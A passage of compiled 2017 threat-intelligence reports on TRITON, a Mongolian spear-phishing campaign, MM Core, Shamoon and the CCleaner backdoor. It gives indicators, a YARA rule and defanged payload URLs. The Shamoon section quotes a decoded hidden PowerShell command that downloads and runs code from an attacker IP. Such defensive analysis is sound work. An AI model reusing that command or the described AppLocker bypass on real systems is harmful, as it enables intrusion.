s payload. These file names were hard coded in
the Py2EXE compiled python script.
Trilog.exe took one option from the command line, which was a single IP address of the target
Triconex device. It did not leverage the underlying TRITON library
s capability for Triconex
device discovery, instead an instance of trilog.exe had to be invoked separately for each target
controller in the environment. Once invoked, trilog.exe checked the status of the controller,
then read the configuration information exposed by the TriStation protocol. If the controller was
in a running state, trilog.exe encoded the two payload files inject.bin and imain.bin and passed
them to the communication libraries to be appended to the controller
s program memory and
execution table.
After payload files were inserted into memory on the Triconex controller, the script initiated a
countdown, periodically checking the status of the controller. If an error was detected, the
communication library
s method SafeAppendProgramMod attempted to reset the controller to
the previous state using a TriStation protocol command. If this failed, trilog.exe attempted to
write a small
dummy
program to memory. We assess that this was an anti-forensics
technique to hide the presence of the attacker code on the Triconex controller.
Working with the asset owner, Mandiant ran trilog.exe in a lab environment with a valid
Triconex controller and discovered a conditional check in the malware that prevented the
payload binary from persisting in the environment. Mandiant confirmed that, after correcting
patching the attack script to remove this check, the payload binary would persist in controller
memory, and the controller would continue to run.
TRITON implements the TriStation protocol, which is the protocol used by the legitimate
TriStation application, to configure controllers.
TsHi is the high-level interface created by the malware
s authors that allows the threat actor
operators to implement attack scripts using the TRITON framework. It exposes functions for
both reconnaissance and attack. The functions generally accept binary data from the user, and
handle the code
signing
and check sums prior to passing the data to lower level libraries for
serialization on to the network.
TsBase, another attacker-written module, contains the functions called by TsHi, which translate
the attacker
s intended action to the appropriate TriStation protocol function code. For certain
functions, it also packs and pads the data in to the appropriate format.
TsLow is an additional attacker module that implements the TriStation UDP wire protocol. The
TsBase library primarily depends on the ts_exec method. This method takes the function code
and expected response code, and serializes the commands payload over UDP. It checks the
response from the controller against the expected value and returns a result data structure
indicating success or a False object representing failure.
8/10
TsLow also exposes the connect method used to check connectivity to the target controller. If
invoked with no targets, it runs the device discovery function detect_ip. This leverages a "ping"
message over the TriStation protocol using IP broadcast to find controllers that are reachable
via a router from where the script is invoked.
Indicators
Filename
Hash
trilog.exe
MD5: 6c39c3f4a08d3d78f2eb973a94bd7718
SHA-256:
e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230
imain.bin
MD5: 437f135ba179959a580412e564d3107f
SHA-256:
08c34c6ac9186b61d9f29a77ef5e618067e0bc9fe85cab1ad25dc6049c376949
inject.bin
MD5: 0544d425c7555dc4e9d76b571f31f500
SHA-256:
5fc4b0076eac7aa7815302b0c3158076e3569086c4c6aa2f71cd258238440d14
library.zip
MD5: 0face841f7b2953e7c29c064d6886523
SHA-256:
bef59b9a3e00a14956e0cd4a1f3e7524448cbe5d3cc1295d95a15b83a3579c59
TS_cnames.pyc
MD5: e98f4f3505f05bf90e17554fbc97bba9
SHA-256:
2c1d3d0a9c6f76726994b88589219cb8d9c39dd9924bc8d2d02bf41d955fe326
TsBase.pyc
MD5: 288166952f934146be172f6353e9a1f5
SHA-256:
1a2ab4df156ccd685f795baee7df49f8e701f271d3e5676b507112e30ce03c42
TsHi.pyc
MD5: 27c69aa39024d21ea109cc9c9d944a04
SHA-256:
758598370c3b84c6fbb452e3d7119f700f970ed566171e879d3cb41102154272
TsLow.pyc
MD5: f6b3a73c8c87506acda430671360ce15
SHA-256:
5c776a33568f4c16fee7140c249c0d2b1e0798a96c7a01bfd2d5684e58c9bb32
sh.pyc
MD5: 8b675db417cc8b23f4c43f3de5c83438
SHA-256:
c96ed56bf7ee85a4398cc43a98b4db86d3da311c619f17c8540ae424ca6546e1
Detection
9/10
rule TRITON_ICS_FRAMEWORK
meta:
author = "nicholas.carr @itsreallynick"
md5 = "0face841f7b2953e7c29c064d6886523"
description = "TRITON framework recovered during Mandiant ICS incident response"
strings:
$python_compiled = ".pyc" nocase ascii wide
$python_module_01 = "__module__" nocase ascii wide
$python_module_02 = "" nocase ascii wide
$python_script_01 = "import Ts" nocase ascii wide
$python_script_02 = "def ts_" nocase ascii wide
$py_cnames_01 = "TS_cnames.py" nocase ascii wide
$py_cnames_02 = "TRICON" nocase ascii wide
$py_cnames_03 = "TriStation " nocase ascii wide
$py_cnames_04 = " chassis " nocase ascii wide
$py_tslibs_01 = "GetCpStatus" nocase ascii wide
$py_tslibs_02 = "ts_" ascii wide
$py_tslibs_03 = " sequence" nocase ascii wide
$py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ nocase ascii wide
$py_tslibs_05 = /module\s?version/ nocase ascii wide
$py_tslibs_06 = "bad " nocase ascii wide
$py_tslibs_07 = "prog_cnt" nocase ascii wide
$py_tsbase_01 = "TsBase.py" nocase ascii wide
$py_tsbase_02 = ".TsBase(" nocase ascii wide
$py_tshi_01 = "TsHi.py" nocase ascii wide
$py_tshi_02 = "keystate" nocase ascii wide
$py_tshi_03 = "GetProjectInfo" nocase ascii wide
$py_tshi_04 = "GetProgramTable" nocase ascii wide
$py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide
$py_tshi_06 = ".TsHi(" ascii nocase wide
$py_tslow_01 = "TsLow.py" nocase ascii wide
$py_tslow_02 = "print_last_error" ascii nocase wide
$py_tslow_03 = ".TsLow(" ascii nocase wide
$py_tslow_04 = "tcm_" ascii wide
$py_tslow_05 = " TCM found" nocase ascii wide
$py_crc_01 = "crc.pyc" nocase ascii wide
$py_crc_02 = "CRC16_MODBUS" ascii wide
$py_crc_03 = "Kotov Alaxander" nocase ascii wide
$py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
$py_crc_05 = "crc16ret" ascii wide
$py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
$py_crc_07 = /CRC16_CCITT[^_]/ ascii wide
$py_sh_01 = "sh.pyc" nocase ascii wide
$py_keyword_01 = " FAILURE" ascii wide
$py_keyword_02 = "symbol table" nocase ascii wide
$py_TRIDENT_01 = "inject.bin" ascii nocase wide
$py_TRIDENT_02 = "imain.bin" ascii nocase wide
condition:
2 of ($python_*) and 7 of ($py_*) and filesize < 3MB
10/10
Spear Phishing Techniques Used in Attacks Targeting the
Mongolian Government
fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
Introduction
FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government.
Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with
Poison Ivy, a popular remote access tool (RAT) that has been used for nearly a decade for key logging, screen and
video capture, file transfers, password theft, system administration, traffic relaying, and more. The threat actors
behind this attack demonstrated some interesting techniques, including:
1. Customized evasion based on victim profile
The campaign used a publicly available technique to evade
AppLocker application whitelisting applied to the targeted systems.
2. Fileless execution and persistence
In targeted campaigns, threat actors often attempt to avoid writing an
executable to the disk to avoid detection and forensic examination. The campaign we observed used four
stages of PowerShell scripts without writing the the payloads to individual files.
3. Decoy documents
This campaign used PowerShell to download benign documents from the Internet and
launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity.
Attack Cycle
The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word
document that launched a malicious PowerShell payload.
The threat actors used two publicly available techniques, an AppLocker whitelisting bypass and a script to inject
shellcode into the userinit.exe process. The malicious payload was spread across multiple PowerShell scripts,
making its execution difficult to trace. Rather than being written to disk as individual script files, the PowerShell
payloads were stored in the registry.
Figure 1 shows the stages of the payload execution from the malicious macro.
1/10
Figure 1: Stages of payload execution used in this attack
Social Engineering and Macro-PowerShell Level 1 Usage
Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for
logging into webmail or information regarding a state law proposal.
When a targeted user opens the malicious document, they are presented with the messages shown in Figure 2,
asking them to enable macros.
2/10
Figure 2: Lure suggesting the user to enable Macros to see content
Bypassing Application Whitelisting Script Protections (AppLocker)
Microsoft application whitelisting solution AppLocker prevents unknown executables from running on a system. In
April 2016, a security researcher demonstrated a way to bypass this using regsvr32.exe, a legitimate Microsoft
executable permitted to execute in many AppLocker policies. The regsvr32.exe executable can be used to download
a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique
bypasses AppLocker restrictions and permits the execution of code within the SCT file.
We observed implementation of this bypass in the macro code to invoke regsvr32.exe, along with a URL passed to
it which was hosting a malicious SCT file, as seen in Figure 3.
3/10
Figure 3: Command after de-obfuscation to bypass AppLocker via regsv32.exe
Figure 4 shows the entire command line parameter used to bypass AppLocker.
Figure 4: Command line parameter used to bypass AppLocker
We found that the malicious SCT file invokes WScript to launch PowerShell in hidden mode with an encoded
command, as seen in Figure 5.
Figure 5: Content of SCT file containing code to launch encoded PowerShell
Decoding SCT: Decoy launch and Stage Two PowerShell
After decoding the PowerShell command, we observed another layer of PowerShell instructions, which served two
purposes:
1. There was code to download a decoy document from the Internet and open it in a second winword.exe process
using the Start-Process cmdlet. When the victim enables macros, they will see the decoy document shown in Figure
6. This document contains the content described in the spear phishing email.
4/10
Figure 6: Decoy downloaded and launched on the victim
s screen
2. After launching the decoy document in the second winword.exe process, the PowerShell script downloads and
runs another PowerShell script named f0921.ps1 as shown in Figure 7.
Figure 7: PowerShell to download and run decoy decoy document and third-stage payload
Third Stage PowerShell Persistence
The third stage PowerShell script configures an encoded PowerShell command persistently as base64 string in the
HKCU: \Console\FontSecurity registry key. Figure 8 shows a portion of the PowerShell commands for writing this
value to the registry.
5/10
Figure 8: Code to set registry with encoded PowerShell script
Figure 9 shows the registry value containing encoded PowerShell code set on the victims
system.
Figure 9: Registry value containing encoded PowerShell script
Figure 10 shows that using Start-Process, PowerShell decodes this registry and runs the malicious code.
Figure 10: Code to decode and run malicious content from registry
The third stage PowerShell script also configures another registry value named
HKCU\CurrentVersion\Run\SecurityUpdate to launch the encoded PowerShell payload stored in the HKCU:
\Console\FontSecurity key. Figure 11 shows the code for these actions. This will execute the PowerShell payload
when the user logs in to the system.
6/10
Figure 11: PowerShell registry persistence
Fourth Stage PowerShell Inject-LocalShellCode
The HKCU\Console\FontSecurity registry contains the fourth stage PowerShell script, shown decoded in Figure 12.
This script borrows from the publicly available Inject-LocalShellCode PowerShell script from PowerSploit to inject
shellcode.
Figure 12: Code to inject shellcode
Shellcode Analysis
The shellcode has a custom XOR based decryption loop that uses a single byte key (0xD4), as seen in Figure 13.
7/10
Figure 13: Decryption loop and call to decrypted shellcode
After the shellcode is decrypted and run, it injects a Poison Ivy backdoor into the userinit.exe as shown in Figure 14.
8/10
Figure 14: Code injection in userinit.exe and attempt to access Poison Ivy related DAT files
In the decrypted shellcode, we also observed content and configuration related to Poison Ivy. Correlating these
bytes to the standard configuration of Poison Ivy, we can observe the following:
Active setup
StubPath
Encryption/Decryption key - version2013
Mutex name - 20160509
The Poison Ivy configuration dump is shown in Figure 15.
9/10
Figure 15: Poison Ivy configuration dump
Conclusion
Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent
publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and
publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in
memory and leave few forensic artifacts on a compromised host.
FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here. It detects and
blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage
PowerShell payload. HX also contains generic detections for the registry persistence, AppLocker bypasses and
subsequent stages of PowerShell abuse used in this attack.
10/10
MM Core In-Memory Backdoor Returns as "BigBoss" and
"SillyGoose"
blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose
Introduction
by Nicholas Griffin and Roland Dela Paz
In October 2016 Forcepoint Security Labs
discovered new versions of the MM Core backdoor being used in
targeted attacks. Also known as
BaneChant
, MM Core is a file-less APT which is executed in memory by a
downloader component. It was first reported in 2013 under the version number
2.0-LNK
where it used the tag
BaneChant
in its command-and-control (C2) network request. A second version
2.1-LNK
with the network tag
StrangeLove
was discovered shortly after.
In this blog we will detail our discovery of the next two versions of MM Core, namely
BigBoss
(2.2-LNK) and
SillyGoose
(2.3-LNK). Attacks using "BigBoss" appear likely to have occurred since mid-2015,
whereas "SillyGoose" appears to have been distributed since September 2016. Both versions still appear to be
active.
Targeted Regions and Industries
In 2013 MM Core was reported to target Middle Eastern and Central Asian countries. Our own telemetry suggests
that both Africa and the United States have also been recent targets. The following list shows the targeted industries
we have observed:
News & Media
Government - Defence
Oil & Gas Manufacturing
Telecommunications
MM Core Capabilities
An overview of MM Core backdoor
s functionalities is as follows:
Send infected system
s computer name, windows version, system time, running processes, TCP/IP
configuration, and top level directory listings for drives C to H
Download and execute file
Download and execute file in memory
Update itself
Uninstall itself
Infection Method
Previously the MM Core downloader component was downloaded and executed through shellcode by a DOC file
exploiting CVE 2012-0158. However, the new DOC exploit we found exploits a more recent CVE-2015-1641
Microsoft Word vulnerability which it uses to extract embedded malware. The extracted malware is then executed
by leveraging a DLL side-loading vulnerability.
The DOC file we analysed (SHA1 d336b8424a65f5c0b83328aa89089c2e4ddbcf72) was named
US pak track ii
naval dialogues.doc
. This document exploits CVE-2015-1641 and executes shellcode which drops a legitimate
Microsoft executable along with a trojanised DLL named
ChoiceGuard.dll
. The shellcode then executes the
Microsoft executable, causing the malicious DLL to automatically be loaded into the file when it is run - hence the
term "side-loading". The DLL downloads and executes the file-less MM Core backdoor in memory, which uses
steganography to hide itself inside a JPEG file. The JPEG contains code to decrypt itself using the Shikata ga
nai algorithm.
Once decrypted and executed in memory, the MM Core backdoor will extract and install an embedded downloader
when it is first run and add it to Windows start-up for persistence. This downloader, which is similar to the first
trojanised DLL, is then executed and will download the MM Core JPEG once again, executing it in memory like
before. This time MM Core will conduct its backdoor routine which will send off system information and await further
commands.
An overview of this infection process is as follows:
Valid Certificates
Some of the downloader components we found (i.e. "ChoiceGuard.dll") are signed with a valid authenticode
certificate from Russian organisation "Bor Port":
We suspect that this may be a stolen certificate as it is very unlikely that a malware author would sign malware with
their own organisation's certificate.
Updated Malware Artefacts
Newer versions of MM Core use updated version tags, mutexes, and filenames as compared with their 2013
counterparts. These are listed in the table below:
Evasion Tactics
The MM Core actors have made significant efforts to prevent security researchers from tracking their
infrastructure. The first two versions of MM Core back in 2013 used spoofed registrant information in order to
register the C2 domains, whereas the new campaigns use C2s registered using a registrant privacy protection
service. This makes it more difficult to track the actors' infrastructure using WHOIS data.
The actors have also registered their domains on BigRock, a popular web hosting company, in order to blend in with
the noise of legitimate sites that are hosted on the same infrastructure.
Forcepoint Protection Statement
Forcepoint
customers are protected against this threat via TRITON
ACE at the following
stages of attack:
Stage 5 (Dropper File) - The malware components are prevented from being downloaded and/or executed.
Stage 6 (Call Home) - Network traffic used by the downloaders and MM Core is identified and blocked.
Conclusion
MM Core is an active threat targeting multiple countries and high profile industries. It is interesting to note that even
though MM Core
s version has incremented twice, the core backdoor code has remained almost the same apart
from the new file and mutex names. Largely this is perhaps due to the file-less nature of its payload, which may also
explain why the majority of the updates were in the delivery mechanism. At the same time this demonstrates that the
attackers behind MM Core very well know what they are doing, updating the malware just enough to keep their
operation under the radar after all these years.
On the other hand, while the volume of related MM Core samples remain low, we noticed that the MM Core
downloader shares code, techniques and network infrastructure with a trojan called "Gratem", as well as sharing the
same authenticode certificate for recent samples. Gratem is a more active downloader malware family which has
been distributed since at least 2014. Ultimately this suggests that MM Core may be a part of a larger operation that
is yet to be fully uncovered.
Indicators of Compromise
Documents
d336b8424a65f5c0b83328aa89089c2e4ddbcf72 (US pak track ii naval dialogues.doc)
Dropper/Downloader Samples (SHA1)
f94bada2e3ef2461f9f9b291aac8ffbf81bf46ab
ef59b4ffc8a92a5a49308ba98cb38949f74774f1
1cf86d87140f13bf88ede74654e01853bae2413c
415ad0a84fe7ae5b88a68b8c97d2d27de5b3aed2
e8bfa4ed85aac19ab2e77e2b6dfe77252288d89b
f94bada2e3ef2461f9f9b291aac8ffbf81bf46ab
83e7b2d6ea775c8eb1f6cfefb32df754609a8129
b931d3988eb37491506504990cae3081208e1a66
7031f4be6ced5241ae0dd4315d66a261f654dbd6
ab53485990ac503fb9c440ab469771fac661f3cc
b8e6f570e02d105df2d78698de12ae80d66c54a2
188776d098f61fa2c3b482b2ace202caee18b411
e0ed40ec0196543814b00fd0aac7218f23de5ec5
5498bb49083289dfc2557a7c205aed7f8b97b2a8
ce18064f675348dd327569bd50528286929bc37a
3a8b7ce642a5b4d1147de227249ecb6a89cbd2d3
21c1904477ceb8d4d26ac9306e844b4ba0af1b43
f89a81c51e67c0bd3fc738bf927cd7cc95b05ea6
MM Core Unpacked DLL Samples (SHA1)
13b25ba2b139b9f45e21697ae00cf1b452eeeff5
c58aac5567df7676c2b08e1235cd70daec3023e8
4372bb675827922280e8de87a78bf61a6a3e7e4d
08bfdefef8a1fb1ea6f292b1ed7d709fbbc2c602
Related Gratem Samples (SHA1)
673f315388d9c3e47adc280da1ff8b85a0893525
f7372222ec3e56d384e7ca2650eb39c0f420bc88
Dropper/Downloader Payload Locations
hxxp://davidjone[.]net/huan/normaldot.exe
MM Core Payload Locations
hxxp://mockingbird.no-ip[.]org/plugins/xim/top.jpg
hxxp://presspublishing24[.]net/plugins/xim/top.jpg
hxxp://ichoose.zapto[.]org/plugins/cc/me.jpg
hxxp://presspublishing24[.]net/plugins/cc/me.jpg
hxxp://waterlily.ddns[.]net/plugins/slm/pogo.jpg
hxxp://presspublishing24[.]net/plugins/slm/pogo.jpg
hxxp://nayanew1.no-ip[.]org/plugins/xim/top.jpg
hxxp://davidjone[.]net/plugins/xim/top.jpg
hxxp://hawahawa123.no-ip[.]org/plugins/xim/logo.jpg
hxxp://davidjone[.]net/plugins/xim/logo.jpg
MM Core C2s
hxxp://presspublishing24[.]net/plugins/cc/mik.php
hxxp://presspublishing24[.]net/plugins/slm/log.php
hxxp://presspublishing24[.]net/plugins/xim/trail.php
Gratem Second Stage Payload Locations
hxxp://adnetwork33.redirectme[.]net/wp-content/themes/booswrap/layers.png
hxxp://network-resources[.]net/wp-content/themes/booswrap/layers.png
hxxp://adworks.webhop[.]me/wp-content/themes/bmw/s6.png
hxxp://adrev22[.]ddns.net/network/superads/logo.dat
hxxp://davidjone[.]net/network/superads/logo.dat
The Full Shamoon: How the Devastating Malware Was Inserted Into Networks
securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/
2/15/2017
Authored by the IBM X-Force Incident Response and Intelligence Services (IRIS) team.
Researchers from the IBM X-Force Incident Response and Intelligence Services (IRIS) team identified a missing link in the operations of a threat actor involved in recent Shamoon
malware attacks against Gulf state organizations. These attacks, which occurred in November 2016 and January 2017, reportedly affected thousands of computers across multiple
government and civil organizations in Saudi Arabia and elsewhere in Gulf states. Shamoon is designed to destroy computer hard drives by wiping the master boot record (MBR) and data
irretrievably, unlike ransomware, which holds the data hostage for a fee.
Through their recent investigations, our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon
malware on targeted infrastructures. It
s worth mentioning that, according to X-Force IRIS, the initial compromise took place weeks before the actual Shamoon deployment and activation
were launched.
Shamoon Attacks Preceded by Malicious Macros and PowerShell Commands
Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks, X-Force IRIS responders sought out the attackers
entry point. Their findings pointed to what
appears to be the initial point of compromise the attackers used: a document containing a malicious macro that, when approved to execute, enabled C2 communications to the attacker
server and remote shell via PowerShell.
The document was not the only one discovered in the recent attack waves. X-Force IRIS researchers had been tracking earlier activity associated with similar malicious, PowerShell-laden
documents themed as resumes and human resources documents, some of which related to organizations in Saudi Arabia. This research identified several bouts of offensive activity that
occurred in the past few months, which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their
targets to establish an initial foothold in the network.
Learn more about IBM X-Force IRIS
Initial Compromise Vector Previously Unclear
Although Shamoon was previously documented in research blogs, the specific network compromise methods leading to the attacks have remained unclear in the reported cases. X-Force
IRIS researchers studied Shamoon
s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies. This research led them to believe that the actor
using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations:
1. Attackers send a spear phishing email to employees at the target organization. The email contains a Microsoft Office document as an attachment.
2. Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine.
3. Attackers can now communicate with the compromised machine and remotely execute commands on it.
4. The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network.
5. Attackers study the network by connecting to additional systems and locating critical servers.
6. The attackers deploy the Shamoon malware.
7. A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped.
Figure 1: Shamoon Attack
Logical Flow of Events
A Phish Is Speared
X-Force IRIS identified the below malicious document:
Detail
Info
File name
cv_itworx.doc
45b0e5a457222455384713905f886bd4
SHA256
528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
Hosting
hxxp://mol.com-ho[.]me/cv_itworx.doc
Embedded
PowerShell
PowerShell.exe -window hidden -e
cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQB3ACAAaABpAGQAZABlAG4AIAAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQBjACAAIgBpAGUAeAAoAE4AZQB3AC
Decode
PowerShell.exe -w hidden -noni -nop -c
iex(New-Object System.Net.WebClient).DownloadString(
hxxp://139.59.46.154:3485/eiloShaegae1
Our researchers examined the domain that hosted the first malicious file, mol.com-ho[.]me. Per the domain
s WHOIS record, an anonymized registrant registered com-ho[.]me in October
2016 and used it to serve malicious documents with similar macro activation features. The following list of documents included:
File Name
File MD5
cv.doc
f4d18316e367a80e1005f38445421b1f
cv_itworx.doc
45b0e5a457222455384713905f886bd4
cv_mci.doc
f4d18316e367a80e1005f38445421b1f
discount_voucher_codes.xlsm
19cea065aa033f5bcfa94a583ae59c08
Health_insurance_plan.doc
ecfc0275c7a73a9c7775130ebca45b74
Health_insurance_registration.doc
1b5e33e5a244d2d67d7a09c4ccf16e56
job_titles.doc
fa72c068361c05da65bf2117db76aaa8
job_titles_itworx.doc
43fad2d62bc23ffdc6d301571135222c
job_titles_mci.doc
ce25f1597836c28cf415394fb350ae93
Password_Policy.xlsm
03ea9457bf71d51d8109e737158be888
These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload.
A closer review of the file names revealed
IT Worx
and
MCI.
A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt. MCI
is Saudi Arabia
s Ministry of Commerce and Investment. It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and
lure them to open the attachment.
X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern:
briefl[.]ink/{a-z0-9}[5].
File Detail
Info
File name
job_titles_itworx.doc
File Detail
Info
43fad2d62bc23ffdc6d301571135222c
SHA256
e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6
Hosting URL
hxxp://briefl.ink/qhtma
The following figure is a visual example of what employees may have encountered when they opened the malicious Word files sent to them in preparation for a Shamoon attack:
Figure 2: Malicious Word Document Delivered in Preparation of a Shamoon Malware Attack (Source: X-Force IRIS)
Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure, identifying additional domains used by the threat actors.
Domain
Name
Spoofed Site
ntg-sa[.]com
The domain ntg-sa[.]com appears to spoof the legit domain ntg.sa.com associated with the Namer Trading Group. Per their webpage, NTG
was established
primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia.
mapsmodon[.]club
The maps-modon[.]club domain appears to spoof maps.modon.gov.sa, which is associated with the Saudi Industrial Property Authority, an organization
responsible for the development of industrial cities with integrated infrastructure and services.
X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa[.]com. This file duped targets into believing it was a Flash player
installer that would drop a Windows batch to invoke PowerShell into the same C2 communications.
Breakdown of the PowerShell-Related Macro
Analysis of one of the threat actor
s documents found that if the macro executes, it launches two separate PowerShell Scripts. The first one executes a PowerShell script served from
hxxp://139.59.46.154:3485/eiloShaegae1. The host is possibly related to attacks that served the Pupy RAT, a publicly available cross-platform remote access tool.
The second script calls VirtualAlloc to create a buffer, uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread. Metasploit is an open
source framework popular as a tool for developing and executing exploit code against a remote target machine. The shellcode performs a DWORD XOR of 4 bytes at an offset from the
beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times.
If this execution is successful, it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from hxxp://45.76.128.165:4443/0w0O6. This
is then returned as a string to PowerShell, which calls invoke-expression (iex) on it, indicating that the expected payload is PowerShell.
Of note, the macro contained a DownloadFile() function that would use URLDownloadToFileA, but this was never actually used.
Based on observations associated with the malicious document, we observed subsequent shell sessions probably associated with Metasploit
s Meterpreter that enabled deployment of
additional tools and malware preceding deployment of three Shamoon-related files: ntertmgr32.exe, ntertmgr64.exe and vdsk911.sys.
Shamoon
s Back, But for How Long This Time?
Although the complete list of Shamoon
s victims is not public, Bloomberg reported that in one case, thousands of computers were destroyed at the headquarters of Saudi
s General
Authority of Civil Aviation, erasing critical data and bringing operations to a halt for several days.
The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves, but those are likely to subside following the public attention the cases have
garnered since late 2016.
Saudi Arabia released a warning to local organizations about the Shamoon malware, alerting about potential attacks and advising organizations to prepare. Analysis and warnings about
Shamoon are resulting in preparation on the targets
end, and actors are likely to disappear and change their tactics until the next wave of attacks.
For technical details on this research and related indicators of compromise, see the X-Force Advisory on X-Force Exchange.
Evidence Aurora Operation Still Active: Supply Chain Attack
Through CCleaner
intezer.com /evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/
9/20/2017
Recently, there have been a few attacks with a supply chain infection, such as Shadowpad being implanted in many
of Netsarang
s products, affecting millions of people. You may have the most up to date cyber security software, but
when the software you are trusting to keep you protected gets infected there is a problem. A backdoor, inserted into
legitimate code by a third party with malicious intent, leads to millions of people being hacked and their information
stolen.
Avast
s CCleaner software had a backdoor encoded into it by someone who had access to the supply chain.
Through somewhere that had access to the source code of CCleaner, the main executable in v5.33.6162 had been
modified to include a backdoor. The official statement from Avast can be found here
The Big Connection:
Costin Raiu, director of Global Research and Analysis Team at Kaspersky Lab, was the first to find a code
connection between APT17 and the backdoor in the infected CCleaner:
The malware injected into #CCleaner has shared code with several tools used by one of the APT
groups from the #Axiom APT 'umbrella'.
Costin Raiu (@craiu) September 19, 2017
Using Intezer Analyze
, we were able to verify the shared code between the backdoor implanted in CCleaner and
earlier APT17 samples. The photo below is the result of uploading the CCBkdr module to Intezer Analyze
, where
the results show there is an overlap in code. With our technology, we can compare code to a huge database of
malicious and trusted software
that
s how we can prove that this code has never been seen before in any other
software.
A deeper analysis leads us to the functions shown below. The code in question is a unique implementation of
base64 only previously seen in APT17 and not in any public repository, which makes a strong case about attribution
to the same threat actor.
This code connection is huge news. APT17, also known as Operation Aurora, is one of the most sophisticated cyber
attacks ever conducted and they specialize in supply chain attacks. In this case, they probably were able to hack
CCleaner
s build server in order to plant this malware. Operation Aurora started in 2009 and to see the same threat
actor still active in 2017 could possibly mean there are many other supply chain attacks by the same group that we
are not aware of. The previous attacks are attributed to a Chinese group called PLA Unit 61398.
Technical Analysis:
The infected CCleaner file that begins the analysis is from
6f7840c77f99049d788155c1351e1560b62b8ad18ad0e9adda8218b9f432f0a9
A technical analysis was posted by Talos here ( http://blog.talosintelligence.com/2017/09/avast-distributesmalware.html).
The flow-graph of the malicious CCleaner is as follows (taken from the Talos report):
Infected function:
Load and execute the payload code:
After the embedded code is decrypted and executed, the next step is a PE (portable executable) file loader. A PE file
loader basically emulates the process of what happens when you load an executable file on Windows. Data is read
from the PE header, from a module created by the malware author.
The PE loader first begins by resolving the addresses of imports commonly used by loaders and calling them.
GetProcAddress to get the addresses of external necessary functions, LoadLibraryA to load necessary modules into
memory and get the address of the location of the module in memory, VirtualAlloc to create memory for somewhere
to copy the memory, and in some cases, when not implemented, and memcpy to copy the buffer to the newly
allocated memory region.
After the module is copied to memory, to load it properly, the proper loading procedure is executed. The relocation
table is read to adjust the module to the base address of the allocated memory region, the import table is read, the
necessary libraries are loaded, and the import address table is filled with the correct addresses of the imports. Next,
the entire PE header is overwritten with 0
s, a mechanism to destroy the PE header tricking security software into not
realizing this module is malicious, and after the malicious code begins execution.
The main module does the following:
1. Tries an anti-debug technique using time and IcmpSendEcho to wait
2. Collect data about the computer (Operating system, computer name, DNS domain, running processes, e tc)
3. Allocates memory for payload to retrieve from C&C server
4. Contacts C&C server at IP address 216.126.225.148
a. If this IP address is unreachable, uses a domain generation algorithm and uses a different domain depending
on the month and year
5. Executes code sent by C&C
By the time of the analysis, we were unable to get our hands on the code sent by the C&Cs.
If you would like to analyze the malware yourself, you may refer to my tweet.
#ccleaner malware DLL w/ IAT fix https://t.co/FprmtmkV64 https://t.co/dgWiQVd31k @TalosSecurity
@malwrhunterteam pic.twitter.com/TxsbveFoHJ
Jay Rosenberg (@jaytezer) September 18, 2017
By Jay Rosenberg
Jay Rosenberg is a self-taught reverse engineer from a very young age (12 years old), specializing in
Reverse Engineering and Malware Analysis. Currently working as a Senior Security Researcher in
Intezer.
Evidence Aurora Operation Still Active Part 2: More Ties
Uncovered Between CCleaner Hack & Chinese Hackers
intezer.com /evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinesehackers/
10/2/2017
Since my last post, we have found new evidence in the next stage payloads of the CCleaner supply chain attack that
provide a stronger link between this attack and the Axiom group.
First of all, our researchers would like to thank the entire team at Cisco Talos for their excellent work on this attack
(their post regarding stage 2 can be found here) as well as their cooperation by allowing us access to the stage 2
payload. Also, we would like to give a special thanks to Kaspersky Labs for their collaboration.
The Next Connection
Starting from the stage 2 payload, I reverse engineered the module, extracting other hidden shellcode and binaries
within. After uploading the different binaries to Intezer Analyze
, the final payload (that I have access to) had a
match with a binary relating to the Axiom group.
1/17
At first glance, I believed it was going to be the same custom base64 function as mentioned in my previous blog
post. A deeper look in the shared code proved otherwise.
